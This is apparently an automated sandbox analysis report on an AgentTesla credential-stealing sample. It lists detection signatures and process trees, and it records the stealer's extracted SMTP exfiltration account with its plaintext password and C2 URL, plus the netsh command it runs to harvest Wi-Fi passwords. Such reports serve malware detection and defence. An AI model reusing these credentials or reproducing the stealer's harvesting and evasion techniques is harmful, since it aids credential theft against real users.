Analysis Report sample2.bin

Overview

General Information

Sample Name: sample2.bin (renamed file extension from bin to exe)
Analysis ID: 339443
MD5: b0f2d519ccae5bf1435264e0979770ce
SHA1: 212da7b3ed9c89d83941f6bb0dba889fa24f8f6a
SHA256: a4fdc26d6b70eaf0a62cca36286412901f48881eae616d38b96d8ae0cb0f29c7

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • sample2.exe (PID: 7104 cmdline: 'C:\Users\user\Desktop\sample2.exe' MD5: B0F2D519CCAE5BF1435264E0979770CE)
    • sample2.exe (PID: 5652 cmdline: {path} MD5: B0F2D519CCAE5BF1435264E0979770CE)
      • netsh.exe (PID: 2208 cmdline: 'netsh' wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 4612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • nwama.exe (PID: 6508 cmdline: 'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe' MD5: B0F2D519CCAE5BF1435264E0979770CE)
    • nwama.exe (PID: 7068 cmdline: {path} MD5: B0F2D519CCAE5BF1435264E0979770CE)
      • netsh.exe (PID: 5780 cmdline: 'netsh' wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • nwama.exe (PID: 5848 cmdline: 'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe' MD5: B0F2D519CCAE5BF1435264E0979770CE)
    • nwama.exe (PID: 6592 cmdline: {path} MD5: B0F2D519CCAE5BF1435264E0979770CE)
      • netsh.exe (PID: 5480 cmdline: 'netsh' wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "GILTzioSjfs2NDI", "URL: ": "http://eu0j0ejPMgs9.com", "To: ": "", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "6QRSH5w5UD", "From: ": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000012.00000002.991842162.0000000002D70000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.661861944.0000000003D5A000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000012.00000002.991287271.0000000002C14000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000B.00000002.996705258.0000000003454000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000001.00000002.987520387.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(19 entries in total; only the first five are shown here)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.sample2.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
18.2.nwama.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
11.2.nwama.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Capture Wi-Fi password
Source: Process started
Author: Joe Security
Data: Command: 'netsh' wlan show profile, CommandLine: 'netsh' wlan show profile, CommandLine|base64offset|contains: V, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: {path}, ParentImage: C:\Users\user\Desktop\sample2.exe, ParentProcessId: 5652, ProcessCommandLine: 'netsh' wlan show profile, ProcessId: 2208

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: sample2.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Avira: detection malicious, Label: TR/Kryptik.bkfmg
Found malware configuration
Source: sample2.exe.5652.1.memstr | Malware Configuration Extractor: Agenttesla {"Username: ": "GILTzioSjfs2NDI", "URL: ": "http://eu0j0ejPMgs9.com", "To: ": "", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "6QRSH5w5UD", "From: ": ""}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Metadefender: Detection: 25%
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | ReversingLabs: Detection: 80%
Multi AV Scanner detection for submitted file
Source: sample2.exe | Metadefender: Detection: 25%
Source: sample2.exe | ReversingLabs: Detection: 80%
Source: 1.2.sample2.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 18.2.nwama.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 11.2.nwama.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: C:\Users\user\Desktop\sample2.exe | Code function: 1_2_05FF13C2 CryptUnprotectData,
Source: C:\Users\user\Desktop\sample2.exe | Code function: 1_2_05FF1387 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_05C11066 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_05C1102B CryptUnprotectData,
Source: sample2.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\sample2.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: sample2.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Vendetta\source\repos\Defender Protect\Defender Protect\obj\Debug\Defender Protect.pdb | source: sample2.exe, 00000000.00000002.665736666.0000000006290000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.720529552.0000000002F86000.00000004.00000001.sdmp, nwama.exe, 0000000F.00000002.736332738.00000000031A6000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb | source: sample2.exe, 00000000.00000002.667266340.0000000006CA0000.00000002.00000001.sdmp, sample2.exe, 00000001.00000002.999576706.0000000006670000.00000002.00000001.sdmp, nwama.exe, 0000000A.00000002.725183141.00000000069F0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.1000299165.0000000006510000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.740831894.0000000006B60000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.998659429.0000000005F50000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://eu0j0ejPMgs9.com
Source: global traffic | TCP traffic: 192.168.2.4:49760 -> 208.91.198.143:587
Source: Joe Sandbox View | IP Address: 208.91.198.143 208.91.198.143
Source: global traffic | TCP traffic: 192.168.2.4:49760 -> 208.91.198.143:587
Source: unknown | DNS traffic detected: queries for: us2.smtp.mailhostbox.com
Source: nwama.exe, 00000012.00000002.991463168.0000000002CAE000.00000004.00000001.sdmp, nwama.exe, 00000012.00000002.992391711.0000000002DDC000.00000004.00000001.sdmp | String found in binary or memory: http://eu0j0ejPMgs9.com
Source: sample2.exe, 00000001.00000003.724871830.00000000013B4000.00000004.00000001.sdmp | String found in binary or memory: http://eu0j0ejPMgs9.com3853321935-2125563209-4053062332-1002_Classes

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\sample2.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\sample2.exe
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
Source: sample2.exe, 00000000.00000002.658005987.0000000000DCA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\sample2.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary:

.NET source code contains very large strings
Source: sample2.exe, ClassCore.cs | Long String: Length: 86015
Source: 0.2.sample2.exe.590000.0.unpack, ClassCore.cs | Long String: Length: 86015
Source: 0.0.sample2.exe.590000.0.unpack, ClassCore.cs | Long String: Length: 86015
Source: nwama.exe.1.dr, ClassCore.cs | Long String: Length: 86015
Source: 1.0.sample2.exe.ee0000.0.unpack, ClassCore.cs | Long String: Length: 86015
Source: 1.2.sample2.exe.ee0000.1.unpack, ClassCore.cs | Long String: Length: 86015
Source: 10.0.nwama.exe.7c0000.0.unpack, ClassCore.cs | Long String: Length: 86015
Source: 10.2.nwama.exe.7c0000.0.unpack, ClassCore.cs | Long String: Length: 86015
Source: 11.2.nwama.exe.ae0000.1.unpack, ClassCore.cs | Long String: Length: 86015
Source: 11.0.nwama.exe.ae0000.0.unpack, ClassCore.cs | Long String: Length: 86015
Source: 15.2.nwama.exe.8d0000.0.unpack, ClassCore.cs | Long String: Length: 86015
Source: 15.0.nwama.exe.8d0000.0.unpack, ClassCore.cs | Long String: Length: 86015
Source: 18.2.nwama.exe.520000.1.unpack, ClassCore.cs | Long String: Length: 86015
Source: 18.0.nwama.exe.520000.0.unpack, ClassCore.cs | Long String: Length: 86015
Source: C:\Users\user\Desktop\sample2.exe | Code function: 0_2_06D109DA NtQuerySystemInformation,
Source: C:\Users\user\Desktop\sample2.exe | Code function: 0_2_06D1086A NtQueryInformationProcess,
Source: C:\Users\user\Desktop\sample2.exe | Code function: 0_2_06D10848 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\sample2.exe | Code function: 0_2_06D1099F NtQuerySystemInformation,
Source: C:\Users\user\Desktop\sample2.exe | Code function: 1_2_0163B362 NtQuerySystemInformation,
Source: C:\Users\user\Desktop\sample2.exe | Code function: 1_2_0163B331 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_06A609DA NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_06A6086A NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_06A6099F NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_06A60848 NtQueryInformationProcess,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541E97
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06547280
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542281
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06543281
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542EA3
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06548AAC
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06548AA9
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542B4F
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06547378
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654236E
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542710
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06545F10
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654331D
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541FD8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065423C2
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542BFD
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542FED
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542F96
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541F84
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542BA6
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542C54
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06543044
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06545C43
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654E848
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06545070
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542416
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06548017
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654202C
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065420D4
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065464D8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065430F2
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541CF3
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065428EF
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541C9F
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654309B
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542080
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065424AF
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06540717
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542CAB
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542D59
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541D47
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06543149
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542D02
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06545102
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654393A
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542128
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065479F8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065431E5
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065479E7
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541DEF
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541D9B
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654258F
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542188
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542DB0
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_00EE3EF3
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_007C2379
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05010928
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05012D88
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_050145C0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_050125E8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05019A17
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_0501AE18
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_050136D0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05015108
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05012555
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05014591
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_050125A1
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05012DC8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05016400
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05016410
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05016839
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05015C60
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05015C70
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05019C90
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05019CA0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_050144BB
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_050154F2
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_0501CF50
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_0501DFD0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05016220
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05016230
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_0501666A
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05016678
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05015292
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05015298
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05011AE0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_0501A2E7
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_0501A2F8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05015EF8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_007C3EF3
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_00AE2379
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A8AB8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A0717
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A83C0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1C6F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A5088
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A4950
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A222D
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A7A00
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2E07
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A8642
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1E43
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2EA3
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A8AB4
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A7288
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2281
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A3281
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1E97
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1EEB
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2EFA
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A22D5
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A331D
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2710
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A236E
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2B4F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2BA6
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A7380
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1F84
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2F96
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2FED
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2BFD
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A23C2
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1FD8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A202C
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A801F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2416
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A5078
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A3044
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062AE850
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2C54
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2CAB
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A0717
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A24AF
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2080
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A309B
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1C9F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A28EF
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A64E0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A30F2
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1CF3
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A20D4
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2128
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A393A
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A493F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A510A
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2D02
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A3149
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1D47
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2D59
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2DB0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A2188
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A258F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1D9B
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A1DEF
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A79EF
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A31E5
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_00AE3EF3
                  Source: sample2.exe | Binary or memory string: OriginalFilename vs sample2.exe
                  Source: sample2.exe, 00000000.00000002.665736666.0000000006290000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDefender Protect.dllB vs sample2.exe
                  Source: sample2.exe, 00000000.00000000.641747188.0000000000592000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamezEzEVogzGVZLHnuzSL.exe> vs sample2.exe
                  Source: sample2.exe, 00000000.00000002.661861944.0000000003D5A000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameZDSzqrTJuDfzMqxLEyQzcgIBdWeNZukRqLeO.exe4 vs sample2.exe
                  Source: sample2.exe, 00000000.00000002.667266340.0000000006CA0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs sample2.exe
                  Source: sample2.exe, 00000000.00000002.658005987.0000000000DCA000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamemscorwks.dllT vs sample2.exe
                  Source: sample2.exe | Binary or memory string: OriginalFilename vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.987673444.000000000044C000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameZDSzqrTJuDfzMqxLEyQzcgIBdWeNZukRqLeO.exe4 vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.987712878.0000000000EE2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamezEzEVogzGVZLHnuzSL.exe> vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.997574179.0000000005770000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewbemdisp.tlbj% vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.999576706.0000000006670000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.999762206.00000000066D0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx.mui vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.999470130.0000000006600000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.997991959.0000000005A30000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs sample2.exe
                  Source: sample2.exe | Binary or memory string: OriginalFilenamezEzEVogzGVZLHnuzSL.exe> vs sample2.exe
                  Source: sample2.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: sample2.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
